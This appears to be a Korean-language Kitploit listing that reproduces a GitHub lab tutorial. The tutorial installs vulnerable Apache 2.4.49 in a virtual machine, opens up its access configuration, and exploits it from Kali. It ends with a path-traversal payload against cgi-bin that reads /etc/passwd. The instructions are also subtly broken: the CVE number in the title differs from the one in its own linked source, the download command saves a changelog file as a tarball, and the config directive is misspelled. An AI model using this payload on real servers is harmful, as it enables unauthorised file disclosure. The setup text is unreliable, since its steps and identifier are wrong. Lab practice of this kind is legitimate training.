Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-4773 — 가상 머신으로 CVE-2021-4773 취약점을 악용하는 방법에 대한 실습 예제입니다 | Kitploit
도구/GitHubGitHub/alexs18/cve-2021-4773
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubalexs18/cve-2021-4773

CVE-2021-4773

가상 머신으로 CVE-2021-4773 취약점을 악용하는 방법에 대한 실습 예제입니다

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-4773

이것은 가상 머신을 사용하여 취약점 CVE-2021-4773을 익스플로잇하는 방법에 대한 연습 예제입니다.

이 튜토리얼을 위해 필요한 것

  • Kali Linux 가상 머신
  • Ubuntu Server 가상 머신
  • Apache 버전 2.4.49 설치

자, 시작해봅시다. 두 대의 가상 머신이 실행 중인 상태에서 아카이브 저장소를 사용하여 Apache 버전 2.4.49를 설치할 것입니다. 해당 버전은 여기에서 찾을 수 있습니다. https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Ubuntu 서버에 취약한 버전 설치 및 구성

1 첫 번째로 서버 가상 머신에서 다음 명령어를 실행해야 합니다.

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  또는 wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 두 번째로 이 Apache 버전의 압축을 다음과 같이 풉니다.

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 다음 패키지들을 설치합니다.

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 메인 디렉터리에서 실행 파일(파일 이름 configure)을 실행하며 설치 디렉터리를 지정하는 플래그를 사용합니다.

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 취약한 버전을 컴파일합니다.

root@kitploit:~
make

6 취약한 버전을 설치합니다.

root@kitploit:~
make install

7 버전을 확인합니다.

root@kitploit:~
ls /usr/local/apache2

8 프로세스를 시작합니다.

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 프로세스를 확인합니다.

root@kitploit:~
ps aux | grep httpd

10 취약점을 구성합니다. /usr/local/apache2/conf/httpd.conf 파일을 찾아 admin 디렉터리를 구성합니다. 디렉터리 태그를 찾아 Require all denied를 다음과 같이 변경합니다.

root@kitploit:~
  Required all granted
  

Files .ht* 태그를 찾아 Require all denied를 다음과 같이 변경합니다.

root@kitploit:~
  Required all granted

첫 번째 변경은 로컬 환경에서 취약점을 익스플로잇하기 위한 것이고, 두 번째 변경은 실제 환경에서 노출시키기 위한 것입니다.

Kali Linux에서 취약점 익스플로잇

1 다음 명령어로 nmap을 사용하여 IP 주소를 스캔합니다.

root@kitploit:~
nmap -sV ip_address

2 curl 또는 wget을 사용하여 Apache 서버를 테스트합니다.

root@kitploit:~
curl ip_address 또는 wget ip_address

3 다음 페이지에서 취약점을 익스플로잇하는 방법을 검토하여 문법을 이해할 수 있습니다.

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

또는 다음 페이로드를 사용하십시오.

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
도구 다운로드